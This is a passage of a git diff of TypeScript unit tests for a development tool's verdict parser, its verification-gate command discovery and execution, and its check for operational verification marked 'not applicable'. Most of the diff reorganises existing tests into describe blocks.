+    () => validateStringArray(['a', ''], 'items'),
+    (err: Error) => {
+      assert.ok(err.message.includes('must contain only non-empty strings'));
+      return true;
+    },
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/verdict-parser.test.ts b/src/resources/extensions/gsd/tests/verdict-parser.test.ts
new file mode 100644
index 000000000..c8aafea8c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/verdict-parser.test.ts
@@ -0,0 +1,156 @@
+/**
+ * Tests for verdict-parser.ts — extraction, normalization, and schema validation.
+ *
+ * Regression tests for #2960: extractVerdict() must detect verdicts in both
+ * YAML frontmatter and common markdown body patterns (LLM manual writes).
+ */
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import {
+  extractVerdict,
+  hasVerdict,
+  isAcceptableUatVerdict,
+  isValidMilestoneVerdict,
+} from "../verdict-parser.ts";
+
+// ── extractVerdict ──────────────────────────────────────────────────────────
+
+describe("extractVerdict", () => {
+  it("extracts verdict from YAML frontmatter", () => {
+    const content = "---\nverdict: pass\n---\n\n# Validation";
+    assert.equal(extractVerdict(content), "pass");
+  });
+
+  it("normalizes 'passed' to 'pass' in frontmatter", () => {
+    const content = "---\nverdict: passed\n---\n";
+    assert.equal(extractVerdict(content), "pass");
+  });
+
+  it("extracts case-insensitive verdict from frontmatter", () => {
+    const content = "---\nVerdict: PASS\n---\n";
+    assert.equal(extractVerdict(content), "pass");
+  });
+
+  it("extracts needs-remediation from frontmatter", () => {
+    const content = "---\nverdict: needs-remediation\n---\n";
+    assert.equal(extractVerdict(content), "needs-remediation");
+  });
+
+  it("returns undefined when content has no frontmatter and no markdown verdict", () => {
+    const content = "# Just a heading\n\nSome text without any verdict.";
+    assert.equal(extractVerdict(content), undefined);
+  });
+
+  // ── Regression: #2960 — markdown body verdicts ─────────────────────────
+
+  it("detects **Verdict:** PASS in markdown body (#2960)", () => {
+    const content = [
+      "# M013 — Milestone Validation",
+      "",
+      "**Verdict:** PASS",
+      "",
+      "All slices completed successfully.",
+    ].join("\n");
+    assert.equal(extractVerdict(content), "pass");
+  });
+
+  it("detects **Verdict:** with emoji prefix in markdown body (#2960)", () => {
+    const content = [
+      "# Milestone Validation",
+      "",
+      "**Verdict:** ✅ PASS",
+      "",
+      "Everything looks good.",
+    ].join("\n");
+    assert.equal(extractVerdict(content), "pass");
+  });
+
+  it("detects **Verdict:** needs-remediation in markdown body (#2960)", () => {
+    const content = [
+      "# Milestone Validation",
+      "",
+      "**Verdict:** needs-remediation",
+      "",
+      "Several issues found.",
+    ].join("\n");
+    assert.equal(extractVerdict(content), "needs-remediation");
+  });
+
+  it("normalizes 'passed' to 'pass' in markdown body (#2960)", () => {
+    const content = "# Validation\n\n**Verdict:** Passed\n";
+    assert.equal(extractVerdict(content), "pass");
+  });
+
+  it("detects verdict without colon in bold pattern (#2960)", () => {
+    const content = "# Validation\n\n**Verdict** PASS\n";
+    assert.equal(extractVerdict(content), "pass");
+  });
+
+  it("prefers frontmatter verdict over markdown body", () => {
+    const content = [
+      "---",
+      "verdict: needs-remediation",
+      "---",
+      "",
+      "**Verdict:** PASS",
+    ].join("\n");
+    assert.equal(extractVerdict(content), "needs-remediation");
+  });
+});
+
+// ── hasVerdict ────────────────────────────────────────────────────────────
+
+describe("hasVerdict", () => {
+  it("returns true when verdict field exists", () => {
+    assert.equal(hasVerdict("verdict: pass"), true);
+  });
+
+  it("returns false when no verdict field exists", () => {
+    assert.equal(hasVerdict("# Just a heading"), false);
+  });
+});
+
+// ── isAcceptableUatVerdict ───────────────────────────────────────────────
+
+describe("isAcceptableUatVerdict", () => {
+  it("accepts pass verdict", () => {
+    assert.equal(isAcceptableUatVerdict("pass", undefined), true);
+  });
+
+  it("accepts passed verdict", () => {
+    assert.equal(isAcceptableUatVerdict("passed", undefined), true);
+  });
+
+  it("rejects fail verdict", () => {
+    assert.equal(isAcceptableUatVerdict("fail", undefined), false);
+  });
+
+  it("accepts partial for mixed UAT type", () => {
+    assert.equal(isAcceptableUatVerdict("partial", "mixed"), true);
+  });
+
+  it("rejects partial for artifact-driven UAT type", () => {
+    assert.equal(isAcceptableUatVerdict("partial", "artifact-driven"), false);
+  });
+});
+
+// ── isValidMilestoneVerdict ──────────────────────────────────────────────
+
+describe("isValidMilestoneVerdict", () => {
+  it("accepts pass", () => {
+    assert.equal(isValidMilestoneVerdict("pass"), true);
+  });
+
+  it("accepts needs-attention", () => {
+    assert.equal(isValidMilestoneVerdict("needs-attention"), true);
+  });
+
+  it("accepts needs-remediation", () => {
+    assert.equal(isValidMilestoneVerdict("needs-remediation"), true);
+  });
+
+  it("rejects unknown verdict", () => {
+    assert.equal(isValidMilestoneVerdict("fail"), false);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/verification-evidence.test.ts b/src/resources/extensions/gsd/tests/verification-evidence.test.ts
index a02590a85..65bd9afd0 100644
--- a/src/resources/extensions/gsd/tests/verification-evidence.test.ts
+++ b/src/resources/extensions/gsd/tests/verification-evidence.test.ts
@@ -240,148 +240,6 @@ test("verification-evidence: formatEvidenceTable uses ✅/❌ emoji for pass/fai
   assert.ok(table.includes("❌ fail"), "failing check should have ❌ fail");
 });
 
-// ─── Validator Rule Tests (T03) ──────────────────────────────────────────────
-
-import { validateTaskSummaryContent } from "../observability-validator.ts";
-
-const MINIMAL_SUMMARY_WITH_EVIDENCE = `---
-observability_surfaces:
-  - gate-output
----
-# T03 Summary
-
-## Diagnostics
-Run \`npm test\` to verify.
-
-## Verification Evidence
-| # | Command | Exit Code | Verdict | Duration |
-|---|---------|-----------|---------|----------|
-| 1 | npm run typecheck | 0 | ✅ pass | 2.3s |
-`;
-
-const MINIMAL_SUMMARY_NO_EVIDENCE = `---
-observability_surfaces:
-  - gate-output
----
-# T03 Summary
-
-## Diagnostics
-Run \`npm test\` to verify.
-`;
-
-const MINIMAL_SUMMARY_PLACEHOLDER_EVIDENCE = `---
-observability_surfaces:
-  - gate-output
----
-# T03 Summary
-
-## Diagnostics
-Run \`npm test\` to verify.
-
-## Verification Evidence
-{{evidence_table}}
-`;
-
-const MINIMAL_SUMMARY_NO_CHECKS_EVIDENCE = `---
-observability_surfaces:
-  - gate-output
----
-# T03 Summary
-
-## Diagnostics
-Run \`npm test\` to verify.
-
-## Verification Evidence
-_No verification checks discovered._
-`;
-
-test("verification-evidence: validator accepts summary with real evidence table", () => {
-  const issues = validateTaskSummaryContent("T03-SUMMARY.md", MINIMAL_SUMMARY_WITH_EVIDENCE);
-  const evidenceIssues = issues.filter(
-    (i) => i.ruleId === "evidence_block_missing" || i.ruleId === "evidence_block_placeholder",
-  );
-  assert.equal(evidenceIssues.length, 0, "no evidence warnings for real table");
-});
-
-test("verification-evidence: validator warns when evidence section is missing", () => {
-  const issues = validateTaskSummaryContent("T03-SUMMARY.md", MINIMAL_SUMMARY_NO_EVIDENCE);
-  const match = issues.find((i) => i.ruleId === "evidence_block_missing");
-  assert.ok(match, "should produce evidence_block_missing warning");
-  assert.equal(match!.severity, "warning");
-  assert.equal(match!.scope, "task-summary");
-});
-
-test("verification-evidence: validator warns when evidence section has only placeholder text", () => {
-  const issues = validateTaskSummaryContent("T03-SUMMARY.md", MINIMAL_SUMMARY_PLACEHOLDER_EVIDENCE);
-  const match = issues.find((i) => i.ruleId === "evidence_block_placeholder");
-  assert.ok(match, "should produce evidence_block_placeholder warning");
-  assert.equal(match!.severity, "warning");
-});
-
-test("verification-evidence: validator accepts 'no checks discovered' as valid content", () => {
-  const issues = validateTaskSummaryContent("T03-SUMMARY.md", MINIMAL_SUMMARY_NO_CHECKS_EVIDENCE);
-  const evidenceIssues = issues.filter(
-    (i) => i.ruleId === "evidence_block_missing" || i.ruleId === "evidence_block_placeholder",
-  );
-  assert.equal(evidenceIssues.length, 0, "no evidence warnings for 'no checks discovered'");
-});
-
-// ─── Integration Test: Full Chain (T03) ──────────────────────────────────────
-
-test("verification-evidence: integration — VerificationResult → JSON → table → validator accepts", () => {
-  const tmp = makeTempDir("ve-integration");
-  try {
-    // 1. Create a VerificationResult with 2 checks (1 pass, 1 fail)
-    const result = makeResult({
-      passed: false,
-      checks: [
-        { command: "npm run typecheck", exitCode: 0, stdout: "ok", stderr: "", durationMs: 1500 },
-        { command: "npm run test:unit", exitCode: 1, stdout: "", stderr: "1 failed", durationMs: 3200 },
-      ],
-      discoverySource: "package-json",
-    });
-
-    // 2. Write JSON to temp dir and read it back
-    writeVerificationJSON(result, tmp, "T03");
-    const jsonPath = join(tmp, "T03-VERIFY.json");
-    assert.ok(existsSync(jsonPath), "JSON file should exist");
-
-    const json = JSON.parse(readFileSync(jsonPath, "utf-8"));
-    assert.equal(json.schemaVersion, 1, "schemaVersion should be 1");
-    assert.equal(json.passed, false, "passed should be false");
-    assert.equal(json.checks.length, 2, "should have 2 checks");
-    assert.equal(json.checks[0].verdict, "pass", "first check should pass");
-    assert.equal(json.checks[1].verdict, "fail", "second check should fail");
-
-    // 3. Generate evidence table and embed in a mock summary
-    const table = formatEvidenceTable(result);
-    assert.ok(table.includes("npm run typecheck"), "table should contain first command");
-    assert.ok(table.includes("npm run test:unit"), "table should contain second command");
-
-    const fullSummary = `---
-observability_surfaces:
-  - gate-output
----
-# T03 Summary
-
-## Diagnostics
-Run \`npm test\` to verify.
-
-## Verification Evidence
-${table}
-`;
-
-    // 4. Validate — no evidence warnings
-    const issues = validateTaskSummaryContent("T03-SUMMARY.md", fullSummary);
-    const evidenceIssues = issues.filter(
-      (i) => i.ruleId === "evidence_block_missing" || i.ruleId === "evidence_block_placeholder",
-    );
-    assert.equal(evidenceIssues.length, 0, "validator should accept real evidence from formatEvidenceTable");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
 // ─── Retry Evidence Field Tests (S03/T01) ─────────────────────────────────────
 
 test("verification-evidence: writeVerificationJSON with retryAttempt and maxRetries includes them in output", () => {
diff --git a/src/resources/extensions/gsd/tests/verification-gate.test.ts b/src/resources/extensions/gsd/tests/verification-gate.test.ts
index 05a96fcd5..b15d539ad 100644
--- a/src/resources/extensions/gsd/tests/verification-gate.test.ts
+++ b/src/resources/extensions/gsd/tests/verification-gate.test.ts
@@ -15,7 +15,7 @@
  *  11. Dependency audit — git diff detection, npm audit parsing, graceful failures
  */
 
-import test from "node:test";
+import { describe, test, beforeEach, afterEach } from "node:test";
 import assert from "node:assert/strict";
 import { mkdirSync, writeFileSync, rmSync } from "node:fs";
 import { join, dirname } from "node:path";
@@ -37,37 +37,30 @@ function makeTempDir(prefix: string): string {
 
 // ─── Discovery Tests ─────────────────────────────────────────────────────────
 
-test("verification-gate: discoverCommands from preference commands", () => {
-  const tmp = makeTempDir("vg-pref");
-  try {
+describe("verification-gate: discovery", () => {
+  let tmp: string;
+  beforeEach(() => { tmp = makeTempDir("vg-discovery"); });
+  afterEach(() => { rmSync(tmp, { recursive: true, force: true }); });
+
+  test("discoverCommands from preference commands", () => {
     const result = discoverCommands({
       preferenceCommands: ["npm run lint", "npm run test"],
       cwd: tmp,
     });
     assert.deepStrictEqual(result.commands, ["npm run lint", "npm run test"]);
     assert.equal(result.source, "preference");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: discoverCommands from task plan verify field", () => {
-  const tmp = makeTempDir("vg-taskplan");
-  try {
+  test("discoverCommands from task plan verify field", () => {
     const result = discoverCommands({
       taskPlanVerify: "npm run lint && npm run test",
       cwd: tmp,
     });
     assert.deepStrictEqual(result.commands, ["npm run lint", "npm run test"]);
     assert.equal(result.source, "task-plan");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: discoverCommands from package.json scripts", () => {
-  const tmp = makeTempDir("vg-pkg");
-  try {
+  test("discoverCommands from package.json scripts", () => {
     writeFileSync(
       join(tmp, "package.json"),
       JSON.stringify({
@@ -86,14 +79,9 @@ test("verification-gate: discoverCommands from package.json scripts", () => {
       "npm run test",
     ]);
     assert.equal(result.source, "package-json");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: first-non-empty-wins — preference beats task plan and package.json", () => {
-  const tmp = makeTempDir("vg-precedence");
-  try {
+  test("first-non-empty-wins — preference beats task plan and package.json", () => {
     writeFileSync(
       join(tmp, "package.json"),
       JSON.stringify({ scripts: { lint: "eslint ." } }),
@@ -105,14 +93,9 @@ test("verification-gate: first-non-empty-wins — preference beats task plan and
     });
     assert.deepStrictEqual(result.commands, ["custom-check"]);
     assert.equal(result.source, "preference");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: task plan verify beats package.json", () => {
-  const tmp = makeTempDir("vg-tp-beats-pkg");
-  try {
+  test("task plan verify beats package.json", () => {
     writeFileSync(
       join(tmp, "package.json"),
       JSON.stringify({ scripts: { lint: "eslint ." } }),
@@ -123,25 +106,15 @@ test("verification-gate: task plan verify beats package.json", () => {
     });
     assert.deepStrictEqual(result.commands, ["custom-verify"]);
     assert.equal(result.source, "task-plan");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: missing package.json → 0 checks, source none", () => {
-  const tmp = makeTempDir("vg-no-pkg");
-  try {
+  test("missing package.json → 0 checks, source none", () => {
     const result = discoverCommands({ cwd: tmp });
     assert.deepStrictEqual(result.commands, []);
     assert.equal(result.source, "none");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: package.json with no matching scripts → 0 checks", () => {
-  const tmp = makeTempDir("vg-no-scripts");
-  try {
+  test("package.json with no matching scripts → 0 checks", () => {
     writeFileSync(
       join(tmp, "package.json"),
       JSON.stringify({ scripts: { build: "tsc", start: "node index.js" } }),
@@ -149,14 +122,9 @@ test("verification-gate: package.json with no matching scripts → 0 checks", ()
     const result = discoverCommands({ cwd: tmp });
     assert.deepStrictEqual(result.commands, []);
     assert.equal(result.source, "none");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: empty preference array falls through to task plan", () => {
-  const tmp = makeTempDir("vg-empty-pref");
-  try {
+  test("empty preference array falls through to task plan", () => {
     const result = discoverCommands({
       preferenceCommands: [],
       taskPlanVerify: "echo ok",
@@ -164,19 +132,100 @@ test("verification-gate: empty preference array falls through to task plan", ()
     });
     assert.deepStrictEqual(result.commands, ["echo ok"]);
     assert.equal(result.source, "task-plan");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  });
+
+  test("package.json with only test script → returns only npm run test", () => {
+    writeFileSync(
+      join(tmp, "package.json"),
+      JSON.stringify({
+        scripts: {
+          test: "vitest",
+          build: "tsc",
+          start: "node index.js",
+        },
+      }),
+    );
+    const result = discoverCommands({ cwd: tmp });
+    assert.deepStrictEqual(result.commands, ["npm run test"]);
+    assert.equal(result.source, "package-json");
+  });
+
+  test("taskPlanVerify with single command (no &&)", () => {
+    const result = discoverCommands({
+      taskPlanVerify: "npm test",
+      cwd: tmp,
+    });
+    assert.deepStrictEqual(result.commands, ["npm test"]);
+    assert.equal(result.source, "task-plan");
+  });
+
+  test("whitespace-only preference commands fall through", () => {
+    writeFileSync(
+      join(tmp, "package.json"),
+      JSON.stringify({ scripts: { lint: "eslint ." } }),
+    );
+    const result = discoverCommands({
+      preferenceCommands: ["  ", ""],
+      cwd: tmp,
+    });
+    // Whitespace-only strings are trimmed to empty and filtered out
+    assert.equal(result.source, "package-json");
+    assert.deepStrictEqual(result.commands, ["npm run lint"]);
+  });
+
+  test("prose taskPlanVerify is rejected, falls through to package.json", () => {
+    writeFileSync(
+      join(tmp, "package.json"),
+      JSON.stringify({ scripts: { test: "vitest" } }),
+    );
+    const result = discoverCommands({
+      taskPlanVerify: "Document exists, contains all 5 scale names, all 14 semantic tokens",
+      cwd: tmp,
+    });
+    // Prose should be rejected, so it falls through to package.json
+    assert.equal(result.source, "package-json");
+    assert.deepStrictEqual(result.commands, ["npm run test"]);
+  });
+
+  test("prose taskPlanVerify with no package.json → source none", () => {
+    const result = discoverCommands({
+      taskPlanVerify: "Verify the output matches expected format and all fields are present",
+      cwd: tmp,
+    });
+    assert.equal(result.source, "none");
+    assert.deepStrictEqual(result.commands, []);
+  });
+
+  test("valid command in taskPlanVerify still works", () => {
+    const result = discoverCommands({
+      taskPlanVerify: "npm run lint && npm run test",
+      cwd: tmp,
+    });
+    assert.equal(result.source, "task-plan");
+    assert.deepStrictEqual(result.commands, ["npm run lint", "npm run test"]);
+  });
+
+  test("mixed prose and commands in taskPlanVerify — only commands kept", () => {
+    const result = discoverCommands({
+      taskPlanVerify: "Check that everything works && npm run test",
+      cwd: tmp,
+    });
+    // "Check that everything works" is prose (starts with capital, 4+ words)
+    // "npm run test" is a valid command
+    assert.equal(result.source, "task-plan");
+    assert.deepStrictEqual(result.commands, ["npm run test"]);
+  });
 });
 
 // ─── Execution Tests ─────────────────────────────────────────────────────────
 
-test("verification-gate: all commands pass → gate passes", () => {
-  const tmp = makeTempDir("vg-pass");
-  try {
+describe("verification-gate: execution", () => {
+  let tmp: string;
+  beforeEach(() => { tmp = makeTempDir("vg-exec"); });
+  afterEach(() => { rmSync(tmp, { recursive: true, force: true }); });
+
+  test("all commands pass → gate passes", () => {
     const result = runVerificationGate({
-      basePath: tmp,
-      unitId: "T01",
       cwd: tmp,
       preferenceCommands: ["echo hello", "echo world"],
     });
@@ -188,17 +237,10 @@ test("verification-gate: all commands pass → gate passes", () => {
     assert.ok(result.checks[0].stdout.includes("hello"));
     assert.ok(result.checks[1].stdout.includes("world"));
     assert.equal(typeof result.timestamp, "number");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: one command fails → gate fails with exit code + stderr", () => {
-  const tmp = makeTempDir("vg-fail");
-  try {
+  test("one command fails → gate fails with exit code + stderr", () => {
     const result = runVerificationGate({
-      basePath: tmp,
-      unitId: "T01",
       cwd: tmp,
       preferenceCommands: ["echo ok", "sh -c 'echo err >&2; exit 1'"],
     });
@@ -207,33 +249,19 @@ test("verification-gate: one command fails → gate fails with exit code + stder
     assert.equal(result.checks[0].exitCode, 0);
     assert.equal(result.checks[1].exitCode, 1);
     assert.ok(result.checks[1].stderr.includes("err"));
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: no commands discovered → gate passes with 0 checks", () => {
-  const tmp = makeTempDir("vg-empty");
-  try {
+  test("no commands discovered → gate passes with 0 checks", () => {
     const result = runVerificationGate({
-      basePath: tmp,
-      unitId: "T01",
       cwd: tmp,
     });
     assert.equal(result.passed, true);
     assert.equal(result.checks.length, 0);
     assert.equal(result.discoverySource, "none");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: command not found → exit code 127", () => {
-  const tmp = makeTempDir("vg-notfound");
-  try {
+  test("command not found → exit code 127", () => {
     const result = runVerificationGate({
-      basePath: tmp,
-      unitId: "T01",
       cwd: tmp,
       preferenceCommands: ["__nonexistent_command_xyz_42__"],
     });
@@ -241,14 +269,9 @@ test("verification-gate: command not found → exit code 127", () => {
     assert.equal(result.checks.length, 1);
     assert.ok(result.checks[0].exitCode !== 0, "should have non-zero exit code");
     assert.ok(result.checks[0].durationMs >= 0);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: no DEP0190 deprecation warning when running commands", () => {
-  const tmp = makeTempDir("vg-dep0190");
-  try {
+  test("no DEP0190 deprecation warning when running commands", () => {
     // Run a subprocess with --throw-deprecation so any DeprecationWarning
     // becomes a thrown error (non-zero exit). The fix passes the command
     // string to sh -c explicitly instead of using spawnSync(cmd, {shell:true}).
@@ -258,8 +281,6 @@ test("verification-gate: no DEP0190 deprecation warning when running commands",
     const script = [
       `import { runVerificationGate } from ${JSON.stringify(pathToFileURL(gatePath).href)};`,
       `runVerificationGate({`,
-      `  basePath: ${JSON.stringify(tmp)},`,
-      `  unitId: "T-DEP",`,
       `  cwd: ${JSON.stringify(tmp)},`,
       `  preferenceCommands: ["echo dep0190-check"],`,
       `});`,
@@ -282,26 +303,48 @@ test("verification-gate: no DEP0190 deprecation warning when running commands",
       0,
       `Expected exit 0 (no deprecation) but got ${child.status}. stderr: ${child.stderr}`,
     );
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
+  });
 
-test("verification-gate: each check has durationMs", () => {
-  const tmp = makeTempDir("vg-duration");
-  try {
+  test("each check has durationMs", () => {
     const result = runVerificationGate({
-      basePath: tmp,
-      unitId: "T01",
       cwd: tmp,
       preferenceCommands: ["echo fast"],
     });
     assert.equal(result.checks.length, 1);
     assert.equal(typeof result.checks[0].durationMs, "number");
     assert.ok(result.checks[0].durationMs >= 0);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  });
+
+  test("one command fails — remaining commands still run (non-short-circuit)", () => {
+    // First fails, second and third should still execute
+    const result = runVerificationGate({
+      cwd: tmp,
+      preferenceCommands: [
+        "sh -c 'exit 1'",
+        "echo second",
+        "echo third",
+      ],
+    });
+    assert.equal(result.passed, false);
+    assert.equal(result.checks.length, 3, "all 3 commands should run");
+    assert.equal(result.checks[0].exitCode, 1, "first command fails");
+    assert.equal(result.checks[1].exitCode, 0, "second command runs and passes");
+    assert.ok(result.checks[1].stdout.includes("second"));
+    assert.equal(result.checks[2].exitCode, 0, "third command runs and passes");
+    assert.ok(result.checks[2].stdout.includes("third"));
+  });
+
+  test("gate execution uses cwd for spawnSync", () => {
+    // pwd should report the temp dir
+    const result = runVerificationGate({
+      cwd: tmp,
+      preferenceCommands: ["pwd"],
+    });
+    assert.equal(result.passed, true);
+    assert.equal(result.checks.length, 1);
+    // The stdout should contain the tmp dir path (resolving symlinks)
+    assert.ok(result.checks[0].stdout.trim().length > 0, "pwd should produce output");
+  });
 });
 
 // ─── Preference Validation Tests ─────────────────────────────────────────────
@@ -361,62 +404,6 @@ test("verification-gate: validatePreferences floors verification_max_retries", (
   assert.equal(result.errors.length, 0);
 });
 
-// ─── Additional Discovery Tests (T02) ───────────────────────────────────────
-
-test("verification-gate: package.json with only test script → returns only npm run test", () => {
-  const tmp = makeTempDir("vg-only-test");
-  try {
-    writeFileSync(
-      join(tmp, "package.json"),
-      JSON.stringify({
-        scripts: {
-          test: "vitest",
-          build: "tsc",
-          start: "node index.js",
-        },
-      }),
-    );
-    const result = discoverCommands({ cwd: tmp });
-    assert.deepStrictEqual(result.commands, ["npm run test"]);
-    assert.equal(result.source, "package-json");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("verification-gate: taskPlanVerify with single command (no &&)", () => {
-  const tmp = makeTempDir("vg-tp-single");
-  try {
-    const result = discoverCommands({
-      taskPlanVerify: "npm test",
-      cwd: tmp,
-    });
-    assert.deepStrictEqual(result.commands, ["npm test"]);
-    assert.equal(result.source, "task-plan");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("verification-gate: whitespace-only preference commands fall through", () => {
-  const tmp = makeTempDir("vg-ws-pref");
-  try {
-    writeFileSync(
-      join(tmp, "package.json"),
-      JSON.stringify({ scripts: { lint: "eslint ." } }),
-    );
-    const result = discoverCommands({
-      preferenceCommands: ["  ", ""],
-      cwd: tmp,
-    });
-    // Whitespace-only strings are trimmed to empty and filtered out
-    assert.equal(result.source, "package-json");
-    assert.deepStrictEqual(result.commands, ["npm run lint"]);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
 // ─── isLikelyCommand Tests (issue #1066) ────────────────────────────────────
 
 test("isLikelyCommand: known command prefixes are accepted", () => {
@@ -468,116 +455,6 @@ test("isLikelyCommand: short lowercase tokens without flags are accepted (could
   assert.equal(isLikelyCommand("mycheck"), true);
 });
 
-test("verification-gate: prose taskPlanVerify is rejected, falls through to package.json", () => {
-  const tmp = makeTempDir("vg-prose-reject");
-  try {
-    writeFileSync(
-      join(tmp, "package.json"),
-      JSON.stringify({ scripts: { test: "vitest" } }),
-    );
-    const result = discoverCommands({
-      taskPlanVerify: "Document exists, contains all 5 scale names, all 14 semantic tokens",
-      cwd: tmp,
-    });
-    // Prose should be rejected, so it falls through to package.json
-    assert.equal(result.source, "package-json");
-    assert.deepStrictEqual(result.commands, ["npm run test"]);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("verification-gate: prose taskPlanVerify with no package.json → source none", () => {
-  const tmp = makeTempDir("vg-prose-none");
-  try {
-    const result = discoverCommands({
-      taskPlanVerify: "Verify the output matches expected format and all fields are present",
-      cwd: tmp,
-    });
-    assert.equal(result.source, "none");
-    assert.deepStrictEqual(result.commands, []);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("verification-gate: valid command in taskPlanVerify still works", () => {
-  const tmp = makeTempDir("vg-valid-cmd");
-  try {
-    const result = discoverCommands({
-      taskPlanVerify: "npm run lint && npm run test",
-      cwd: tmp,
-    });
-    assert.equal(result.source, "task-plan");
-    assert.deepStrictEqual(result.commands, ["npm run lint", "npm run test"]);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("verification-gate: mixed prose and commands in taskPlanVerify — only commands kept", () => {
-  const tmp = makeTempDir("vg-mixed");
-  try {
-    const result = discoverCommands({
-      taskPlanVerify: "Check that everything works && npm run test",
-      cwd: tmp,
-    });
-    // "Check that everything works" is prose (starts with capital, 4+ words)
-    // "npm run test" is a valid command
-    assert.equal(result.source, "task-plan");
-    assert.deepStrictEqual(result.commands, ["npm run test"]);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-// ─── Additional Execution Tests (T02) ───────────────────────────────────────
-
-test("verification-gate: one command fails — remaining commands still run (non-short-circuit)", () => {
-  const tmp = makeTempDir("vg-no-short-circuit");
-  try {
-    // First fails, second and third should still execute
-    const result = runVerificationGate({
-      basePath: tmp,
-      unitId: "T02",
-      cwd: tmp,
-      preferenceCommands: [
-        "sh -c 'exit 1'",
-        "echo second",
-        "echo third",
-      ],
-    });
-    assert.equal(result.passed, false);
-    assert.equal(result.checks.length, 3, "all 3 commands should run");
-    assert.equal(result.checks[0].exitCode, 1, "first command fails");
-    assert.equal(result.checks[1].exitCode, 0, "second command runs and passes");
-    assert.ok(result.checks[1].stdout.includes("second"));
-    assert.equal(result.checks[2].exitCode, 0, "third command runs and passes");
-    assert.ok(result.checks[2].stdout.includes("third"));
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("verification-gate: gate execution uses cwd for spawnSync", () => {
-  const tmp = makeTempDir("vg-cwd");
-  try {
-    // pwd should report the temp dir
-    const result = runVerificationGate({
-      basePath: tmp,
-      unitId: "T02",
-      cwd: tmp,
-      preferenceCommands: ["pwd"],
-    });
-    assert.equal(result.passed, true);
-    assert.equal(result.checks.length, 1);
-    // The stdout should contain the tmp dir path (resolving symlinks)
-    assert.ok(result.checks[0].stdout.trim().length > 0, "pwd should produce output");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
 // ─── Additional Preference Validation Tests (T02) ──────────────────────────
 
 test("verification-gate: verification_commands produces no unknown-key warnings", () => {
diff --git a/src/resources/extensions/gsd/tests/verification-operational-gate.test.ts b/src/resources/extensions/gsd/tests/verification-operational-gate.test.ts
new file mode 100644
index 000000000..3a17a5488
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/verification-operational-gate.test.ts
@@ -0,0 +1,97 @@
+/**
+ * Regression test for #2931: completing-milestone gate should treat
+ * "None required", "N/A", "Not applicable", etc. as equivalent to "none"
+ * and skip the operational verification content check entirely.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+
+import { isVerificationNotApplicable } from "../auto-dispatch.ts";
+
+test("isVerificationNotApplicable: bare 'none' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("none"), true);
+});
+
+test("isVerificationNotApplicable: 'None' (capitalized) is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("None"), true);
+});
+
+test("isVerificationNotApplicable: 'NONE' (uppercase) is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("NONE"), true);
+});
+
+test("isVerificationNotApplicable: 'None required' is not applicable (#2931)", () => {
+  assert.equal(isVerificationNotApplicable("None required"), true);
+});
+
+test("isVerificationNotApplicable: 'None needed' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("None needed"), true);
+});
+
+test("isVerificationNotApplicable: 'None planned' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("None planned"), true);
+});
+
+test("isVerificationNotApplicable: 'N/A' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("N/A"), true);
+});
+
+test("isVerificationNotApplicable: 'n/a' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("n/a"), true);
+});
+
+test("isVerificationNotApplicable: 'Not applicable' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("Not applicable"), true);
+});
+
+test("isVerificationNotApplicable: 'Not required' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("Not required"), true);
+});
+
+test("isVerificationNotApplicable: 'Not needed' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("Not needed"), true);
+});
+
+test("isVerificationNotApplicable: 'No operational verification needed' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("No operational verification needed"), true);
+});
+
+test("isVerificationNotApplicable: 'No operational' is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("No operational"), true);
+});
+
+test("isVerificationNotApplicable: empty string is not applicable", () => {
+  assert.equal(isVerificationNotApplicable(""), true);
+});
+
